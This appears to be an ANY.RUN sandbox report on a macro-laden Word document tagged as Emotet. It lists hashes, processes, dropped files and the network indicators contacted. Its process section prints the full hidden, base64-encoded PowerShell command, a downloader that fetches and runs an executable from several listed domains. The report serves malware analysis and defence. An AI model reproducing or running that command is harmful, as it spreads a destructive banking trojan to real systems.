analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

public

Full analysis: https://app.any.run/tasks/9750ecc5-2c96-4c12-ab0f-21b011c29dea
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 16:30:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Velit tempora quos., Author: Sascha Koszewski, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 12:56:00 2019, Last Saved Time/Date: Fri Dec 6 12:56:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 337, Security: 0
MD5:

C0943ED0C55119674D76481E59AE04CD

SHA1:

652682F73C2DF82A8BAC5CF2FB1B6DB0D29F16A0

SHA256:

D8C5945164FA48E99B029F251ADC07F411F7D2571ECBB4341E76FC546AE09E55

SSDEEP:

6144:Adv65YoA4CXDI2k4utGiL3HJk+yD7bJA8ejy3:Adv65YoA4CXDI/Qitk57bW8eG3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3780)
    • PowerShell script executed

      • powershell.exe (PID: 3780)
    • Creates files in the user directory

      • powershell.exe (PID: 3780)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2600)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3780)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Velit tempora quos.
Subject: -
Author: Sascha Koszewski
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:06 12:56:00
ModifyDate: 2019:12:06 12:56:00
Pages: 1
Words: 58
Characters: 337
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 394
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2600"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\public.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3780powershell -w hidden -en JABLAHYAcQBsAHMAdAB0AGQAZwA9ACcAVgBqAHUAZAB1AHgAbgBsAHEAYQBjAHoAZAAnADsAJABTAGIAawB5AGcAdQBlAHkAYQB5ACAAPQAgACcANQAzADUAJwA7ACQAUwBrAG4AbQBnAHYAdgBvAHkAPQAnAE4AeABuAGsAYwBlAGIAbwAnADsAJABEAGEAeQB1AGsAbwBnAHIAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBiAGsAeQBnAHUAZQB5AGEAeQArACcALgBlAHgAZQAnADsAJABRAGsAYgBuAG0AcgBlAGgAdwBuAD0AJwBOAGEAcwB0AGMAdABhAG4AZgBlAHoAJwA7ACQARgBqAGkAeQB0AGoAbAB1AGIAZQByAHcAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBFAEIAYwBsAEkARQBuAFQAOwAkAEsAdABmAGcAcwB0AGIAZQB6AGsAcwB5AGYAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgByAGoAbwAuAGMAbwBtAC8ANgBwAHEAYQBtAHkANAAvADIAYQBnAC8AKgBoAHQAdABwADoALwAvAGEAaQByAC0AbwAtAHQAcgBpAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAE4ARwAyAC8AKgBoAHQAdABwADoALwAvAGkAbgBmAC4AYQB3AHcAdABoAGkAbgBnAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG8ANgBsAC8AKgBoAHQAdABwAHMAOgAvAC8AawBhAHIAeQBhAGsAcgBlAGEAcwBpAG4AZABvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AOQB6AHQALwAqAGgAdAB0AHAAcwA6AC8ALwBnAGUAbQBzAHQAYQB0AGUAZABlAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG4AYwAvACcALgAiAHMAUABgAGwASQBUACIAKAAnACoAJwApADsAJABPAGQAcAB6AHUAYwB6AG4AdABiAHoAbQB6AD0AJwBSAGcAYwBoAGUAdwBqAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB3AG4AbQByAGUAeQBhAGwAbQBwAG0AIABpAG4AIAAkAEsAdABmAGcAcwB0AGIAZQB6AGsAcwB5AGYAKQB7AHQAcgB5AHsAJABGAGoAaQB5AHQAagBsAHUAYgBlAHIAdwAuACIARABPAGAAVwBuAEwATwBgAEEARABgAEYAaQBMAGUAIgAoACQAQwB3AG4AbQByAGUAeQBhAGwAbQBwAG0ALAAgACQARABhAHkAdQBrAG8AZwByAGcAKQA7ACQASQBvAGEAZwBsAGsAZgBuAD0AJwBPAGgAYgBsAHkAZQB1AHoAcwBnAGQAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAGEAeQB1AGsAbwBnAHIAZwApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMwA5ADkANgA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAEQAYQB5AHUAawBvAGcAcgBnACkAOwAkAFkAYwBzAHEAZABlAHEAeQBwAHMAdABsAG0APQAnAFAAZwBsAHUAcQBkAHoAYQB3AGYAcwAnADsAYgByAGUAYQBrADsAJABaAGMAeQBpAHMAZQBoAGoAcgBwAGsAPQAnAFEAcgBpAHIAbgByAGgAagBkAGEAcgBmAGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgB3AGwAawBwAGQAeQBtAHQAbABzAGgAZgA9ACcAUgBiAGEAdABtAGgAcwBlAHIAYQBoAGQAdgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 742
Read events
1 888
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
2600WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA89E.tmp.cvr
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1739E76E.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9E49497.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A68EB5AC.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6DC1BD.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F39249A.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD8637D3.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDA9E7B8.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4EC1459.wmf
MD5:
SHA256:
2600WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC97E86.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3780
powershell.exe
GET
404
209.97.150.99:80
http://www.rjo.com/6pqamy4/2ag/
US
xml
345 b
unknown
3780
powershell.exe
GET
404
104.28.31.186:80
http://air-o-trip.com/wp-admin/NG2/
US
xml
345 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3780
powershell.exe
104.28.31.186:80
air-o-trip.com
Cloudflare Inc
US
unknown
3780
powershell.exe
101.50.1.17:443
karyakreasindo.com
PT. Beon Intermedia
ID
malicious
3780
powershell.exe
209.97.150.99:80
www.rjo.com
US
unknown
3780
powershell.exe
205.144.171.162:443
gemstatedev.com
Sharktech
US
suspicious

DNS requests

Domain
IP
Reputation
www.rjo.com
  • 209.97.150.99
unknown
air-o-trip.com
  • 104.28.31.186
  • 104.28.30.186
unknown
inf.awwthings.com
unknown
karyakreasindo.com
  • 101.50.1.17
malicious
gemstatedev.com
  • 205.144.171.162
suspicious

Threats

No threats detected
No debug info